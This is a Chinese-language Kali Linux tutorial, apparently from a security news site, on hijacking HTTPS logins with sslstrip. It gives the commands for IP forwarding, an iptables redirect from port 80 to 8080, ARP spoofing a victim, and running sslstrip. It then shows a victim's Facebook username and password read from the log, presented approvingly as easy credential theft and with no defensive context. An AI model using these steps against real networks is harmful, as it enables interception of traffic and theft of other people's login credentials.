利用sslstrip對HTTPS連接發起中間人攻擊
利用SSLStrip發起中間人攻擊可以透明地劫持網路中的http流量,查找HTTPS鏈接並重定向,然後將這些鏈接映射到類似的HTTP鏈接中或者同形的HTTPS鏈接。
它還支持提供類似鎖定圖標,選擇性日誌記錄和拒絕會話的模式。
step1
首先我們將設備設置為轉發模式,這樣我們的設備就可以轉發目標不是我們設備的數據包。
echo 1>/proc/sys/net/ipv4/ip_forward
step2
還需要設置iptables,將流量從80埠重定向到8080埠,確保出站連接發送到sslstrip中。
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
step3
需要找到我們的網關
route -n
前三步如圖所示
step4
接下來我們需要找到目標主機的IP地址
step5
攻擊者利用ARP欺騙技術將虛假的ARP消息發送到區域網中。
arpspoof -i -t
step6
現在我們打開一個新的終端並監聽8080埠,命令如下
sslstrip -l 8080
step7
現在我們轉到受害主機中,並且在瀏覽器中輸入facebook.com,我們知道Facebook本來是使用的HTTPS協議,但是這裡我們看到與Facebook是通過http建立的連接。
step8
現在,返回到家目錄,查看sslstrip.log日誌文件,我們可以看到受害者登錄時輸入的用戶名和密碼,如圖:
就是這麼easy,我們就拿到了受害者的憑證。
更多kali Linux教程,請參考:
·Lynis—開源安全審計工具詳解
·sqlmap-檢測和利用SQL注入詳解
·HPING3—網路掃描器-包生成器
※看看網路犯罪分子是如何攻擊使用免費Wi-Fi用戶
※如何尋找隱藏在CloudFlare或TOR背後的真實原始IP
TAG:嘶吼RoarTalk |